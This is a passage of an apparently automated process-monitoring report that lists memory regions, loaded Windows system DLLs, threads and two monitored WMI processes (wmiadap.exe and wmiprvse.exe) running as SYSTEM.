filename = ""
Region:
id = 1478
start_va = 0x7354b90000
end_va = 0x7354d17fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000007354b90000"
filename = ""
Region:
id = 1479
start_va = 0x7354d20000
end_va = 0x7354ea0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000007354d20000"
filename = ""
Region:
id = 1480
start_va = 0x7354eb0000
end_va = 0x73562affff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000007354eb0000"
filename = ""
Region:
id = 1481
start_va = 0x7ff6c7aaa000
end_va = 0x7ff6c7aabfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c7aaa000"
filename = ""
Region:
id = 1482
start_va = 0x7ffb3c290000
end_va = 0x7ffb3c2c5fff
entry_point = 0x7ffb3c290000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1483
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1484
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1485
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1486
start_va = 0x7ffb3d020000
end_va = 0x7ffb3d17bfff
entry_point = 0x7ffb3d020000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1487
start_va = 0x7354aa0000
end_va = 0x7354aa3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000007354aa0000"
filename = ""
Region:
id = 1488
start_va = 0x7354ab0000
end_va = 0x7354ab0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000007354ab0000"
filename = ""
Region:
id = 1489
start_va = 0x73562b0000
end_va = 0x7356367fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000073562b0000"
filename = ""
Region:
id = 1490
start_va = 0x73563e0000
end_va = 0x73563effff
entry_point = 0x0
region_type = private
name = "private_0x00000073563e0000"
filename = ""
Region:
id = 1491
start_va = 0x73563f0000
end_va = 0x735646ffff
entry_point = 0x0
region_type = private
name = "private_0x00000073563f0000"
filename = ""
Region:
id = 1492
start_va = 0x7ff6c7aa6000
end_va = 0x7ff6c7aa7fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c7aa6000"
filename = ""
Region:
id = 1493
start_va = 0x7ffb37f40000
end_va = 0x7ffb37f61fff
entry_point = 0x7ffb37f40000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 1494
start_va = 0x7ffb38610000
end_va = 0x7ffb386a5fff
entry_point = 0x7ffb38610000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1495
start_va = 0x7ffb3ca70000
end_va = 0x7ffb3cb14fff
entry_point = 0x7ffb3ca70000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1496
start_va = 0x7354ac0000
end_va = 0x7354ac0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000007354ac0000"
filename = ""
Region:
id = 1497
start_va = 0x7ffb334e0000
end_va = 0x7ffb334fcfff
entry_point = 0x7ffb334e0000
region_type = mapped_file
name = "wdi.dll"
filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")
Region:
id = 1550
start_va = 0x7354ad0000
end_va = 0x7354ad1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000007354ad0000"
filename = ""
Region:
id = 1551
start_va = 0x7354af0000
end_va = 0x7354af1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000007354af0000"
filename = ""
Region:
id = 1552
start_va = 0x7356470000
end_va = 0x73564effff
entry_point = 0x0
region_type = private
name = "private_0x0000007356470000"
filename = ""
Region:
id = 1553
start_va = 0x7ff6c7aa4000
end_va = 0x7ff6c7aa5fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c7aa4000"
filename = ""
Region:
id = 1554
start_va = 0x7ffb251d0000
end_va = 0x7ffb2526dfff
entry_point = 0x7ffb251d0000
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 1555
start_va = 0x7ffb318d0000
end_va = 0x7ffb318d9fff
entry_point = 0x7ffb318d0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1556
start_va = 0x7ffb34cc0000
end_va = 0x7ffb34f33fff
entry_point = 0x7ffb34cc0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll")
Region:
id = 1557
start_va = 0x7ffb34fa0000
end_va = 0x7ffb34fd1fff
entry_point = 0x7ffb34fa0000
region_type = mapped_file
name = "rstrtmgr.dll"
filename = "\\Windows\\System32\\RstrtMgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll")
Region:
id = 1558
start_va = 0x7ffb36f00000
end_va = 0x7ffb36f16fff
entry_point = 0x7ffb36f00000
region_type = mapped_file
name = "radarrs.dll"
filename = "\\Windows\\System32\\radarrs.dll" (normalized: "c:\\windows\\system32\\radarrs.dll")
Region:
id = 1559
start_va = 0x7ffb39810000
end_va = 0x7ffb39845fff
entry_point = 0x7ffb39810000
region_type = mapped_file
name = "ntasn1.dll"
filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")
Region:
id = 1560
start_va = 0x7ffb39850000
end_va = 0x7ffb39875fff
entry_point = 0x7ffb39850000
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 1561
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1562
start_va = 0x7ffb39d70000
end_va = 0x7ffb39d82fff
entry_point = 0x7ffb39d70000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1563
start_va = 0x7ffb39d90000
end_va = 0x7ffb39dd9fff
entry_point = 0x7ffb39d90000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1564
start_va = 0x7ffb39de0000
end_va = 0x7ffb3a407fff
entry_point = 0x7ffb39de0000
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 1565
start_va = 0x7ffb3a570000
end_va = 0x7ffb3a622fff
entry_point = 0x7ffb3a570000
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1566
start_va = 0x7ffb3a9f0000
end_va = 0x7ffb3aa40fff
entry_point = 0x7ffb3a9f0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1567
start_va = 0x7ffb3aa50000
end_va = 0x7ffb3bf74fff
entry_point = 0x7ffb3aa50000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1568
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1569
start_va = 0x7ffb3cb20000
end_va = 0x7ffb3cc60fff
entry_point = 0x7ffb3cb20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Thread:
id = 153
os_tid = 0xf60
Thread:
id = 154
os_tid = 0xf5c
Thread:
id = 155
os_tid = 0xfec
Thread:
id = 156
os_tid = 0xc6c
Thread:
id = 158
os_tid = 0xbcc
Thread:
id = 159
os_tid = 0x7ec
Thread:
id = 162
os_tid = 0xca0
Process:
id = "10"
image_name = "wmiadap.exe"
filename = "c:\\windows\\system32\\wbem\\wmiadap.exe"
page_root = "0x44848000"
os_pid = "0x224"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "child_process"
parent_id = "2"
os_parent_pid = "0x32c"
cmd_line = "wmiadap.exe /F /T /R"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b1b3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1570
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1571
start_va = 0xd637710000
end_va = 0xd63772ffff
entry_point = 0x0
region_type = private
name = "private_0x000000d637710000"
filename = ""
Region:
id = 1572
start_va = 0xd637730000
end_va = 0xd637743fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000d637730000"
filename = ""
Region:
id = 1573
start_va = 0xd637750000
end_va = 0xd6377cffff
entry_point = 0x0
region_type = private
name = "private_0x000000d637750000"
filename = ""
Region:
id = 1574
start_va = 0xd6377d0000
end_va = 0xd6377d3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000d6377d0000"
filename = ""
Region:
id = 1575
start_va = 0xd6377e0000
end_va = 0xd6377e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000d6377e0000"
filename = ""
Region:
id = 1576
start_va = 0xd6377f0000
end_va = 0xd6377f1fff
entry_point = 0x0
region_type = private
name = "private_0x000000d6377f0000"
filename = ""
Region:
id = 1577
start_va = 0x7df5ffe10000
end_va = 0x7ff5ffe0ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffe10000"
filename = ""
Region:
id = 1578
start_va = 0x7ff6d9320000
end_va = 0x7ff6d9342fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6d9320000"
filename = ""
Region:
id = 1579
start_va = 0x7ff6d9349000
end_va = 0x7ff6d9349fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6d9349000"
filename = ""
Region:
id = 1580
start_va = 0x7ff6d934e000
end_va = 0x7ff6d934ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6d934e000"
filename = ""
Region:
id = 1581
start_va = 0x7ff6d9420000
end_va = 0x7ff6d944efff
entry_point = 0x7ff6d9420000
region_type = mapped_file
name = "wmiadap.exe"
filename = "\\Windows\\System32\\wbem\\WMIADAP.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe")
Region:
id = 1582
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1583
start_va = 0xd637710000
end_va = 0xd63771ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000d637710000"
filename = ""
Region:
id = 1584
start_va = 0xd637800000
end_va = 0xd6378bdfff
entry_point = 0xd637800000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1585
start_va = 0xd6379b0000
end_va = 0xd637aaffff
entry_point = 0x0
region_type = private
name = "private_0x000000d6379b0000"
filename = ""
Region:
id = 1586
start_va = 0x7ff6d9220000
end_va = 0x7ff6d931ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6d9220000"
filename = ""
Region:
id = 1587
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1588
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1589
start_va = 0xd637720000
end_va = 0xd637726fff
entry_point = 0x0
region_type = private
name = "private_0x000000d637720000"
filename = ""
Region:
id = 1590
start_va = 0xd6378c0000
end_va = 0xd63793ffff
entry_point = 0x0
region_type = private
name = "private_0x000000d6378c0000"
filename = ""
Region:
id = 1591
start_va = 0xd637940000
end_va = 0xd637946fff
entry_point = 0x0
region_type = private
name = "private_0x000000d637940000"
filename = ""
Region:
id = 1592
start_va = 0xd637b30000
end_va = 0xd637b3ffff
entry_point = 0x0
region_type = private
name = "private_0x000000d637b30000"
filename = ""
Region:
id = 1593
start_va = 0x7ff6d934c000
end_va = 0x7ff6d934dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6d934c000"
filename = ""
Region:
id = 1594
start_va = 0x7ffb33330000
end_va = 0x7ffb333aefff
entry_point = 0x7ffb33330000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1595
start_va = 0x7ffb35dd0000
end_va = 0x7ffb35df4fff
entry_point = 0x7ffb35dd0000
region_type = mapped_file
name = "loadperf.dll"
filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll")
Region:
id = 1596
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1597
start_va = 0x7ffb3a9e0000
end_va = 0x7ffb3a9e7fff
entry_point = 0x7ffb3a9e0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1598
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1599
start_va = 0x7ffb3c570000
end_va = 0x7ffb3c5d8fff
entry_point = 0x7ffb3c570000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1600
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1601
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1602
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1603
start_va = 0xd637950000
end_va = 0xd637950fff
entry_point = 0x0
region_type = private
name = "private_0x000000d637950000"
filename = ""
Region:
id = 1604
start_va = 0xd637960000
end_va = 0xd637960fff
entry_point = 0x0
region_type = private
name = "private_0x000000d637960000"
filename = ""
Region:
id = 1605
start_va = 0xd637970000
end_va = 0xd637970fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000d637970000"
filename = ""
Region:
id = 1606
start_va = 0xd637980000
end_va = 0xd637980fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000d637980000"
filename = ""
Region:
id = 1607
start_va = 0xd637ab0000
end_va = 0xd637b2ffff
entry_point = 0x0
region_type = private
name = "private_0x000000d637ab0000"
filename = ""
Region:
id = 1608
start_va = 0xd637b40000
end_va = 0xd637cc7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000d637b40000"
filename = ""
Region:
id = 1609
start_va = 0xd637cd0000
end_va = 0xd637e50fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000d637cd0000"
filename = ""
Region:
id = 1610
start_va = 0xd637e60000
end_va = 0xd637f1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000d637e60000"
filename = ""
Region:
id = 1611
start_va = 0xd637f20000
end_va = 0xd638256fff
entry_point = 0xd637f20000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1612
start_va = 0xd638260000
end_va = 0xd6382dffff
entry_point = 0x0
region_type = private
name = "private_0x000000d638260000"
filename = ""
Region:
id = 1613
start_va = 0xd6382e0000
end_va = 0xd63835ffff
entry_point = 0x0
region_type = private
name = "private_0x000000d6382e0000"
filename = ""
Region:
id = 1614
start_va = 0xd638360000
end_va = 0xd6383dffff
entry_point = 0x0
region_type = private
name = "private_0x000000d638360000"
filename = ""
Region:
id = 1615
start_va = 0x7ff6d9343000
end_va = 0x7ff6d9344fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6d9343000"
filename = ""
Region:
id = 1616
start_va = 0x7ff6d9345000
end_va = 0x7ff6d9346fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6d9345000"
filename = ""
Region:
id = 1617
start_va = 0x7ff6d9347000
end_va = 0x7ff6d9348fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6d9347000"
filename = ""
Region:
id = 1618
start_va = 0x7ff6d934a000
end_va = 0x7ff6d934bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6d934a000"
filename = ""
Region:
id = 1619
start_va = 0x7ffb2d730000
end_va = 0x7ffb2d743fff
entry_point = 0x7ffb2d730000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1620
start_va = 0x7ffb2d750000
end_va = 0x7ffb2d847fff
entry_point = 0x7ffb2d750000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1621
start_va = 0x7ffb2e4a0000
end_va = 0x7ffb2e4b0fff
entry_point = 0x7ffb2e4a0000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1622
start_va = 0x7ffb39260000
end_va = 0x7ffb39292fff
entry_point = 0x7ffb39260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1623
start_va = 0x7ffb39610000
end_va = 0x7ffb39626fff
entry_point = 0x7ffb39610000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1624
start_va = 0x7ffb39780000
end_va = 0x7ffb3978afff
entry_point = 0x7ffb39780000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1625
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1626
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1627
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1628
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1629
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1630
start_va = 0x7ffb3ca70000
end_va = 0x7ffb3cb14fff
entry_point = 0x7ffb3ca70000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1631
start_va = 0x7ffb3cfb0000
end_va = 0x7ffb3cfb7fff
entry_point = 0x7ffb3cfb0000
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 1870
start_va = 0x7ffb39080000
end_va = 0x7ffb390b1fff
entry_point = 0x7ffb39080000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1871
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Thread:
id = 168
os_tid = 0x378
Thread:
id = 169
os_tid = 0x328
Thread:
id = 170
os_tid = 0x354
Thread:
id = 171
os_tid = 0x35c
Thread:
id = 172
os_tid = 0x320
Thread:
id = 173
os_tid = 0x624
Process:
id = "11"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0x60c9d000"
os_pid = "0x5f0"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "2"
os_parent_pid = "0x32c"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b1b3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1632
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1633
start_va = 0x129f6c0000
end_va = 0x129f6dffff
entry_point = 0x0
region_type = private
name = "private_0x000000129f6c0000"
filename = ""
Region:
id = 1634
start_va = 0x129f6e0000
end_va = 0x129f6f3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000129f6e0000"
filename = ""
Region:
id = 1635
start_va = 0x129f700000
end_va = 0x129f77ffff
entry_point = 0x0
region_type = private
name = "private_0x000000129f700000"
filename = ""
Region:
id = 1636
start_va = 0x129f780000
end_va = 0x129f783fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000129f780000"
filename = ""
Region:
id = 1637
start_va = 0x129f790000
end_va = 0x129f790fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000129f790000"
filename = ""
Region:
id = 1638
start_va = 0x129f7a0000
end_va = 0x129f7a1fff
entry_point = 0x0
region_type = private
name = "private_0x000000129f7a0000"
filename = ""
Region:
id = 1639
start_va = 0x7df5ff2c0000
end_va = 0x7ff5ff2bffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ff2c0000"
filename = ""
Region:
id = 1640
start_va = 0x7ff7b97b0000
end_va = 0x7ff7b97d2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff7b97b0000"
filename = ""
Region:
id = 1641
start_va = 0x7ff7b97dc000
end_va = 0x7ff7b97ddfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b97dc000"
filename = ""
Region:
id = 1642
start_va = 0x7ff7b97de000
end_va = 0x7ff7b97defff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b97de000"
filename = ""
Region:
id = 1643
start_va = 0x7ff7ba0c0000
end_va = 0x7ff7ba13efff
entry_point = 0x7ff7ba0c0000
region_type = mapped_file
name = "wmiprvse.exe"
